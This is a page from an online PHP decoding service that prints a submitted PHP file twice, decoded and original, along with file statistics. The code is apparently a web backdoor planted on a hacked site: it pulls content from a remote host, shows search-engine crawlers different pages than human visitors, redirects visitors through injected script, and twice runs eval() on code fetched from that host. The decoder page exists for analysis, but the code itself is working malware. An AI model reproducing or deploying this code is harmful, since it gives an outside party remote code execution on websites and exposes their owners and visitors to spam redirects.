Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(E_ALL^E_NOTICE^E_WARNING^E_DEPRECATED); $http_type = ((isset($_SER..

Decoded Output download

<?php 
error_reporting(E_ALL^E_NOTICE^E_WARNING^E_DEPRECATED); 
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://'; 
$getCurl = "FILE_GET_CONTENTS"; 
$vurl = "http://yms.dyekg.com/"; 
if (!is_null($_GET['g'])) { 
    $jd = $getCurl($vurl . "1.aspx?sz=".$_GET['g']); 
    $sz =  $_GET['g']; 
} 
else { 
	$jd = $getCurl($vurl . "1.aspx?xy=".$http_type); 
    $sz =  $getCurl($vurl . "1.aspx?jd=".$jd); 
} 
$gjc1=$getCurl($jd."getci.aspx?cid=".$_GET['cid']."&s=2&e=4"); 
$gjc2=$getCurl($jd."getci.aspx?cid=".$_GET['cid']."&s=5&e=7"); 
$hyzhdy = $jd . "0814.aspx"; 
$surl = $jd . "s814.aspx"; 
$m=mt_rand(1,5); 
if (!is_null($_GET['m'])) {$m = $_GET['m'];} 
if (!is_null($_GET['cygj'])) {$kname = urldecode($getCurl($jd . "gn.aspx?iid=" .str_replace("zcjb","", $_GET['cygj'])));} 
if (!is_null($_GET['number'])) { 
  $surl = $surl . "?number=" . $_GET['number'] . "&pnum=" . $_GET['pnum'] . "&cid=" . $_GET['cid'] . "&m=" . $m; 
  $str = $getCurl($surl); 
  $str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str); 
  $str = str_replace('ggggg', $sz, $str); 
  $str = str_replace('iid=', 'cygj=zcjb', $str); 
  header("Content-type:text/xml"); 
  //ob_clean(); 
  echo $str; 
  exit(); 
} 
if(!is_null($_GET['s'])) 
{ 
$str=$getCurl("http://yms.dyekg.com/szh.aspx"); 
$str=str_replace('yymm',$http_type.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'],$str); 
$str=str_replace('&amp;type=1', '', $str); 
$str=str_replace('&amp;type=2', '', $str); 
if($http_type=='https://'){$str=str_replace('?g=', '?g=1', $str);} 
header("Content-type:text/xml"); 
//ob_clean(); 
echo $str; 
exit(); 
} 
$ip=$_SERVER['REMOTE_ADDR']."-".$_SERVER['REMOTE_HOST']."-".$_SERVER['HTTP_CLIENT_IP']."-".$_SERVER['HTTP_X_FORWARDED_FOR']."-".$_SERVER['HTTP_X_FORWARDED']."-".$_SERVER['HTTP_FORWARDED_FOR']."-".$_SERVER['HTTP_FORWARDED']; 
if(!is_null($_GET['kk'])){$ip="66.249.64.190";} 
$domain = $getCurl($jd . "getdomain2.aspx?rnd=1&ip=".$ip); 
 if ($domain=='google') {} 
else  
{ 
  if (!is_null($_GET['cygj'])) { 
	$kname = urldecode($getCurl($jd . "gn.aspx?iid=" .str_replace("zcjb","", $_GET['cygj']))); 
    echo '<script>document.location="'.$jd."a.aspx"."?cid=".$_GET['cid']."&cname=".urlencode($kname)."&ll=".$_SERVER['HTTP_HOST']. '"</script>'; 
	exit(); 
  } 
  if (!is_null($_GET['pnum'])) { 
             $txt = str_replace("products.aspx", "", $jd . "a.aspx") . "?cid=" . $_GET['cid'] ."&ll=".$_SERVER['HTTP_HOST']. ""; 
			echo '<script>document.location="' . $txt . '"</script>'; 
			exit(); 
  } 
} 
?> 
<?php 
  error_reporting(0); 
  eval($getCurl($jd."wph.txt")); 
  error_reporting(0); 
  if (!is_null($_GET['cygj']))  
  {$hyzhdy = $hyzhdy . "?iid=" . urlencode(str_replace("zcjb","",$_GET['cygj'])) . "&cid=" . $_GET['cid']."&m=". $m;} 
  else  
  {$hyzhdy = $hyzhdy . "?cid=" . $_GET['cid'] . "&pnum=" . $_GET['pnum']."&m=". $m;	} 
  $str = $getCurl($hyzhdy); 
  $str = str_replace('ggggg', $sz, $str); 
  $str = str_replace('IIIII', $http_type . $_SERVER['HTTP_HOST'], $str); 
  $str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str); 
  $str = str_replace('iid=', 'cygj=zcjb', $str); 
  echo $str; 
  error_reporting(0); 
  eval($getCurl($jd."wpf.txt")); 
?>

Did this file decode correctly?

Original Code

<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING^E_DEPRECATED);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$getCurl = "FILE_GET_CONTENTS";
$vurl = "http://yms.dyekg.com/";
if (!is_null($_GET['g'])) {
    $jd = $getCurl($vurl . "1.aspx?sz=".$_GET['g']);
    $sz =  $_GET['g'];
}
else {
	$jd = $getCurl($vurl . "1.aspx?xy=".$http_type);
    $sz =  $getCurl($vurl . "1.aspx?jd=".$jd);
}
$gjc1=$getCurl($jd."getci.aspx?cid=".$_GET['cid']."&s=2&e=4");
$gjc2=$getCurl($jd."getci.aspx?cid=".$_GET['cid']."&s=5&e=7");
$hyzhdy = $jd . "0814.aspx";
$surl = $jd . "s814.aspx";
$m=mt_rand(1,5);
if (!is_null($_GET['m'])) {$m = $_GET['m'];}
if (!is_null($_GET['cygj'])) {$kname = urldecode($getCurl($jd . "gn.aspx?iid=" .str_replace("zcjb","", $_GET['cygj'])));}
if (!is_null($_GET['number'])) {
  $surl = $surl . "?number=" . $_GET['number'] . "&pnum=" . $_GET['pnum'] . "&cid=" . $_GET['cid'] . "&m=" . $m;
  $str = $getCurl($surl);
  $str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
  $str = str_replace('ggggg', $sz, $str);
  $str = str_replace('iid=', 'cygj=zcjb', $str);
  header("Content-type:text/xml");
  //ob_clean();
  echo $str;
  exit();
}
if(!is_null($_GET['s']))
{
$str=$getCurl("http://yms.dyekg.com/szh.aspx");
$str=str_replace('yymm',$http_type.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'],$str);
$str=str_replace('&amp;type=1', '', $str);
$str=str_replace('&amp;type=2', '', $str);
if($http_type=='https://'){$str=str_replace('?g=', '?g=1', $str);}
header("Content-type:text/xml");
//ob_clean();
echo $str;
exit();
}
$ip=$_SERVER['REMOTE_ADDR']."-".$_SERVER['REMOTE_HOST']."-".$_SERVER['HTTP_CLIENT_IP']."-".$_SERVER['HTTP_X_FORWARDED_FOR']."-".$_SERVER['HTTP_X_FORWARDED']."-".$_SERVER['HTTP_FORWARDED_FOR']."-".$_SERVER['HTTP_FORWARDED'];
if(!is_null($_GET['kk'])){$ip="66.249.64.190";}
$domain = $getCurl($jd . "getdomain2.aspx?rnd=1&ip=".$ip);
 if ($domain=='google') {}
else 
{
  if (!is_null($_GET['cygj'])) {
	$kname = urldecode($getCurl($jd . "gn.aspx?iid=" .str_replace("zcjb","", $_GET['cygj'])));
    echo '<script>document.location="'.$jd."a.aspx"."?cid=".$_GET['cid']."&cname=".urlencode($kname)."&ll=".$_SERVER['HTTP_HOST']. '"</script>';
	exit();
  }
  if (!is_null($_GET['pnum'])) {
             $txt = str_replace("products.aspx", "", $jd . "a.aspx") . "?cid=" . $_GET['cid'] ."&ll=".$_SERVER['HTTP_HOST']. "";
			echo '<script>document.location="' . $txt . '"</script>';
			exit();
  }
}
?>
<?php
  error_reporting(0);
  eval($getCurl($jd."wph.txt"));
  error_reporting(0);
  if (!is_null($_GET['cygj'])) 
  {$hyzhdy = $hyzhdy . "?iid=" . urlencode(str_replace("zcjb","",$_GET['cygj'])) . "&cid=" . $_GET['cid']."&m=". $m;}
  else 
  {$hyzhdy = $hyzhdy . "?cid=" . $_GET['cid'] . "&pnum=" . $_GET['pnum']."&m=". $m;	}
  $str = $getCurl($hyzhdy);
  $str = str_replace('ggggg', $sz, $str);
  $str = str_replace('IIIII', $http_type . $_SERVER['HTTP_HOST'], $str);
  $str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
  $str = str_replace('iid=', 'cygj=zcjb', $str);
  echo $str;
  error_reporting(0);
  eval($getCurl($jd."wpf.txt"));
?>

Function Calls

None

Variables

None

Stats

MD5	cbe260781bc74880deb37a020636feb3
Eval Count	0
Decode Time	64 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats